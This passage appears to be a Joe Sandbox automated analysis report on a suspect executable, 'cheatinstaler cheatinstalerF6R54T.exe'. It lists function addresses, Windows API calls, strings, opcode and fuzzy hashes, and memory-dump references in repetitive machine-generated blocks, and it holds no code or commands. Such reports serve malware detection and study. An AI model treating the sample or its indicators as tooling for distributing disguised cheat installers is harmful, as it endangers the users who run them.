                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                  • String ID: SIZE
                                                                                  • API String ID: 449872665-3243624926
                                                                                  • Opcode ID: 95182320ee7b3a48c420107a4992996f84afbbac13f0d5532198c1d22c251322
                                                                                  • Instruction ID: dd7003c5f51c86e01fded4fceaaeed52921b6f543cceead5e70d4caf6deaa11c
                                                                                  • Opcode Fuzzy Hash: 95182320ee7b3a48c420107a4992996f84afbbac13f0d5532198c1d22c251322
                                                                                  • Instruction Fuzzy Hash: 5D41B462A1868285EE10AF26E4D53FDA350FF857D0FD84231FA9D066D6EE3CE540CB10
                                                                                  Function 00007FF75457C2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe, xrefs: 00007FF75457C2F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                  • API String ID: 3307058713-2047321637
                                                                                  • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                  • Instruction ID: 399b405e4bf5b9a7fc973eea226159002515cede8da1dfe0bb0c810cb00df47d
                                                                                  • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                  • Instruction Fuzzy Hash: AC418032A08A528AEB15EF27A4E00BCB7A4FF44BD4B9D4035EA4E47B45DE3DE541C760
                                                                                  Function 00007FF754569B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Text$Dialog
                                                                                  • String ID: ASKNEXTVOL
                                                                                  • API String ID: 2638039312-3402441367
                                                                                  • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                  • Instruction ID: 00d8e02b5090f2e379125f045651cf96fe6815da493a1838aea6dd1fecc9f448
                                                                                  • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                  • Instruction Fuzzy Hash: E9417162E0C68291FA14BF23E5E42B9A3A1AF85BC0F9C0035DE4D5B799CE3DE5418360
                                                                                  Function 00007FF754559638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                  • String ID: $%s$@%s
                                                                                  • API String ID: 2650857296-834177443
                                                                                  • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                  • Instruction ID: 0cd5a901af5d5633826a58b0fe45c55d7848b15ec28d4c5f4bf5fccbf0001f1b
                                                                                  • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                  • Instruction Fuzzy Hash: CD31C372B18A4696EA10EF67E4E06F9A3A0FB457C4F881032EE0D07795DE3CE505CB50
                                                                                  Function 00007FF75457EB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType
                                                                                  • String ID: @
                                                                                  • API String ID: 3000768030-2766056989
                                                                                  • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                  • Instruction ID: d683d46af4993ad2fbcc14bb33f8e476d0bbc4ebf57e670bcf2ed764fcfadcca
                                                                                  • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                  • Instruction Fuzzy Hash: D421A522E08B9281EB689F2694E0139AA51FB857B4F6C0335D66F077D4CE3DD981C361
                                                                                  Function 00007FF754574078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF754571D3E), ref: 00007FF7545740BC
                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF754571D3E), ref: 00007FF754574102
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                  • String ID: csm
                                                                                  • API String ID: 2573137834-1018135373
                                                                                  • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                  • Instruction ID: 4aeed5ae51a49b80a65f1e997628e6340d9eaceb5d2d1fc58ca23303aa85ad7a
                                                                                  • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                  • Instruction Fuzzy Hash: CD113D36608B4182EB219F16E490269B7E1FB89B94F5C4231DF8D07765DF3CD655CB00
                                                                                  Function 00007FF75455EA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA63
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA6E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                  • API String ID: 1211598281-2248577382
                                                                                  • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                  • Instruction ID: 1133d15a9a6ace513dff5f7ebed4064bdeaf8a5bac96442d81ee42aca86aaace
                                                                                  • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                  • Instruction Fuzzy Hash: FFE01A21E1990282F650BF279CE64B8B210BF60B70FE80330D13E821E19F2CA945C320
                                                                                  Function 00007FF75455A43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindHandleModuleResource
                                                                                  • String ID: RTL
                                                                                  • API String ID: 3537982541-834975271
                                                                                  • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                  • Instruction ID: 9f9f2d12d8a92a0658a97af9bcc08cfb49f1f3703982e217a28ac24f5de8904e
                                                                                  • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                  • Instruction Fuzzy Hash: 95D05E91F0960282FF29AFB3A4A937462909F18F41FEC5038C84E06390EF2CE488C760